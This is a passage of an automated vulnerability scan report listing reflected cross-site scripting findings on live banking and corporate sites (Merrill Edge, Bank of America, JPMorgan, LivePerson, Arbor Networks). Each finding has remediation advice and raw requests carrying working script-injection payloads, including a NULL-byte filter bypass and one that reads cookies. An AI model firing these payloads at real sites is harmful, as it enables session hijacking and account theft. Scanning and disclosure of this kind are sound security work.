This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=...[SNIP]...; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=33db602922214f42975d86f8f6f2abba; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92020


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.93556"><script>alert(1)</script>754868bc16e=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.110. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [src_cd parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=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; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=2ac698daf6734109aef33eb2bf698471; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'SDMST1.ed4ab';713afc694b6'
,'Page' : 'zero-dollar-trades'
,'preview' : false
};
//]]>
...[SNIP]...

3.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=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; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=64d545196def45c0ab618229e403d55c; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.b5a88"><script>alert(1)</script>68ae74c56a4=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.112. http://www.retirement.merrilledge.com/IRA/ScriptResource.axd [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/ScriptResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=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; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5518


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
/ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace")
...[SNIP]...

3.113. http://www.retirement.merrilledge.com/IRA/WebResource.axd [d parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=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; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:26 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 3965


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
<script type='text/javascript' language='javascript'>g_ml_ira_jsLib_1_0.writeErrorMessage('dbe14061-d790-4130-9806-2537a9416f20','/ira/webresource.axd?d=whzhnkw2eslp_zo8-loxma2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916',"Invalid character in a Base-64 string.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace");</script>
...[SNIP]...

3.114. http://www.retirement.merrilledge.com/IRA/pages/home.aspx [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %009627c"><script>alert(1)</script>ac0806a009c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9627c"><script>alert(1)</script>ac0806a009c in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/pages/home.aspx?%009627c"><script>alert(1)</script>ac0806a009c=1 HTTP/1.1
Host: www.retirement.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=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; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=ede7c355a551459fb3f0986a23c39c18; domain=.merrilledge.com; path=/
Set-Cookie: BrowserCheckDone=true; path=/; HttpOnly
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 36809


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><meta http-equiv="Conten
...[SNIP]...
<a href="../System/SearchResults.aspx?.9627c"><script>alert(1)</script>ac0806a009c=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.115. https://www2.bankofamerica.com/promos/jump/greatdeals/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   https://www2.bankofamerica.com
Path:   /promos/jump/greatdeals/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3bb0e"%20a%3db%20b8409311022 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3bb0e" a=b b8409311022 in the application's response.

This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /promos/jump/greatdeals/?3bb0e"%20a%3db%20b8409311022=1 HTTP/1.1
Host: www2.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 500 Internal Server Error
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:30:31 GMT
Content-type: text/html
Set-Cookie: SMIDENTITY=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; path=/; domain=.bankofamerica.com; secure
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Abnormal
Connection: close

<HTML>
<HEAD>
<TITLE>An Error Has Occurred</TITLE>
</HEAD>

<BODY BGCOLOR="#FFFFFF" TEXT="#FFFFFF" LINK="#FFFFFF" VLINK="#FFFFFF" ALINK="#FFFFFF">

<FORM ACTION="/cferror.cgi" METHOD=POST>

<SCRIPT LA
...[SNIP]...
<XMP> 3BB0E" A=B B8409311022
</XMP>
...[SNIP]...

3.116. https://privacyassist.bankofamerica.com/Pages/English/In_Activation.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Firm
Host:   https://privacyassist.bankofamerica.com
Path:   /Pages/English/In_Activation.asp

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload de1ac"><a>d044400ccc3 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /Pages/English/In_Activation.asp HTTP/1.1
Host: privacyassist.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=de1ac"><a>d044400ccc3

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 33074
Content-Type: text/html
X-Powered-By: ASP.NET
Set-Cookie: ASPSESSIONIDAGCQRSRC=KCDJILIAKJFFAMJGBLOJMJFD; secure; path=/
Date: Wed, 02 Feb 2011 22:00:02 GMT
Connection: close


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html lang="en-US">
<head>

<title>Bank of America | Privacy Assist | Sign In</title>

<meta name="description" content="The s
...[SNIP]...
<input type="hidden" name="hdnSourceURL" value="HTTP://WWW.GOOGLE.COM/SEARCH?HL=EN&Q=DE1AC"><A>D044400CCC3">
...[SNIP]...

3.117. http://solutions.liveperson.com/ref/lppb.asp [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://solutions.liveperson.com
Path:   /ref/lppb.asp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ef54b'-alert(1)-'a8c45daa09 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ref/lppb.asp HTTP/1.1
Host: solutions.liveperson.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Thu, 03 Feb 2011 01:04:59 GMT
Server: Microsoft-IIS/6.0
P3P: CP="NON BUS INT NAV COM ADM CON CUR IVA IVD OTP PSA PSD TEL SAM"
X-Powered-By: ASP.NET
Content-Length: 3685
Content-Type: text/html
Set-Cookie: visitor=ref=http%3A%2F%2Fwww%2Egoogle%2Ecom%2Fsearch%3Fhl%3Den%26q%3Def54b%27%2Dalert%281%29%2D%27a8c45daa09; expires=Tue, 10-Jan-2012 05:00:00 GMT; domain=.liveperson.com; path=/
Set-Cookie: ASPSESSIONIDQSDTDCQS=GECPFOICPDDIKDIBPNDLBLKA; path=/
Cache-control: private

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>

<TITLE>Customer Service Solutions - LivePerson</title>
<META NAME="descripti
...[SNIP]...
<script language='javascript'>
   lpAddVars('visitor','Visitor+Referrer','http://www.google.com/search?hl=en&q=ef54b'-alert(1)-'a8c45daa09');
   lpAddVars('page','pageName','');
</script>
...[SNIP]...

3.118. http://www.bankofamerica.com/help/equalhousing_popup.cfm [Referer HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.bankofamerica.com
Path:   /help/equalhousing_popup.cfm

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a1ff9"><script>alert(1)</script>7f3eaf59b2d was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /help/equalhousing_popup.cfm HTTP/1.1
Host: www.bankofamerica.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: JSESSIONID=0000RE-XjHRWm9KwoOqAPI13-Vp:15c0e1hdv; LANG_COOKIE=en_US; cmTPSet=Y; TLTUID=D98FA69C2F17102F856AA91CC30F81BB; BOA_0020=20110202:0:O:5067fc0c-5451-405a-bffc3c21dd627de9; CONTEXT=en_US; INTL_LANG=en_US; throttle_value=21; TLTSID=D98FA69C2F17102F856AA91CC30F81BB;
Referer: http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Date: Wed, 02 Feb 2011 22:03:25 GMT
Content-type: text/html
P3P: CP="CAO IND PHY ONL UNI FIN COM NAV INT DEM CNT STA POL HEA PRE GOV CUR ADM DEV TAI PSA PSD IVAi IVDi CONo TELo OUR SAMi OTRi"
Page-Completion-Status: Normal
Page-Completion-Status: Normal
Set-Cookie: CFID=131550827; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: CFTOKEN=4a27fbe%2D00085d56%2Dd4ad%2D1d49%2Dbdce%2D839ac02b4552; expires=Sun, 27-Sep-2037 00:00:00 GMT; path=/;
Set-Cookie: GEOSERVER=1; path=/;
Connection: close
Set-Cookie: BIGipServerngen-www.80=967227051.20480.0000; path=/


                                                                               <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<html lang="en-US">
   <head>
       <meta http-equiv="Content-Type" content="te
...[SNIP]...
<a target="_parent" href="http://www.google.com/search?hl=en&q=a1ff9"><script>alert(1)</script>7f3eaf59b2d">
...[SNIP]...

3.119. http://www.jpmorgan.com/pages/jpmorgan [User-Agent HTTP header]

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.jpmorgan.com
Path:   /pages/jpmorgan

Issue detail

The value of the User-Agent HTTP header is copied into an HTML comment. The payload 49599--><script>alert(1)</script>3f6c8a7be9a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /pages/jpmorgan HTTP/1.1
Host: www.jpmorgan.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a
Connection: close

Response

HTTP/1.1 200 OK
Set-Cookie: ACE_COOKIE=R2975777359; path=/; expires=Thu, 03-Feb-2011 22:26:48 GMT
Date: Wed, 02 Feb 2011 22:19:44 GMT
Cache-Control: no-cache="set-cookie"
Content-Type: text/html; charset=UTF-8
host_service: FutureTenseContentServer:6.3.0
X-Powered-By: Servlet/2.4 JSP/2.0
Set-Cookie: JpmcSession=c9JYNJYQ7WXh3nVLQdNX56kVHZr1h13x6LR3BV6XVQ8pnhVHjnMl!-1967453422; path=/
P3P: CP="NON CURa ADMa DEVa TAIa IVAa OUR DELa SAMa LEG UNI PRE"
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">


<head>
   <t
...[SNIP]...
<!-- userAgentPassed:Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)49599--><script>alert(1)</script>3f6c8a7be9a -->
...[SNIP]...

3.120. http://www.arbornetworks.com/ [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8de9b"><script>alert(1)</script>6af6a5ce680 was submitted in the mbfcookie[lang] cookie. This input was echoed as 8de9b\"><script>alert(1)</script>6af6a5ce680 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET / HTTP/1.1
Host: www.arbornetworks.com
Proxy-Connection: keep-alive
Referer: http://www.arbornetworks.com/report
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: e411486dda3a9a212ec0bba8fd7ed343=-; mbfcookie[lang]=en8de9b"><script>alert(1)</script>6af6a5ce680; PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; __utmc=186398841; __utmb=186398841.1.10.1296689848

Response

HTTP/1.0 200 OK
Date: Wed, 02 Feb 2011 23:46:32 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/1.0.0a-fips DAV/2 PHP/5.2.16
X-Powered-By: PHP/5.2.16
Set-Cookie: e411486dda3a9a212ec0bba8fd7ed343=b90d28fbf3f48927538041d78d1a0444; path=/
Set-Cookie: lang=deleted; expires=Tue, 02-Feb-2010 23:46:33 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Tue, 02-Feb-2010 23:46:33 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Thu, 03-Feb-2011 23:46:34 GMT; path=/
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Wed, 02 Feb 2011 23:46:34 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<!-- Template: HomePag
...[SNIP]...
<meta lang="en8de9b\"><script>alert(1)</script>6af6a5ce680">
...[SNIP]...

3.121. http://www.arbornetworks.com/cleanpipes [mbfcookie[lang] cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.arbornetworks.com
Path:   /cleanpipes

Issue detail

The value of the mbfcookie[lang] cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56a91"><script>alert(1)</script>4a8a421a526 was submitted in the mbfcookie[lang] cookie. This input was echoed as 56a91\"><script>alert(1)</script>4a8a421a526 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /cleanpipes HTTP/1.1
Host: www.arbornetworks.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mbfcookie[lang]=en56a91"><script>alert(1)</script>4a8a421a526; e411486dda3a9a212ec0bba8fd7ed343=3968e407f0dd94078ea803dbb07a9e88; __utmz=186398841.1296689848.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); PHPSESSID=aed38ed91c928cbeafc242634170f7eb; __utma=186398841.1861161794.1296689848.1296689848.1296689848.1; mbfcookie=deleted; __utmc=186398841; __utmb=186398841.2.10.1296689848; lang=deleted; e585cbcac8f7bba066a55f149566ddd5=-;

Response

HTTP/1.0 200 OK
Date: Thu, 03 Feb 2011 00:01:50 GMT
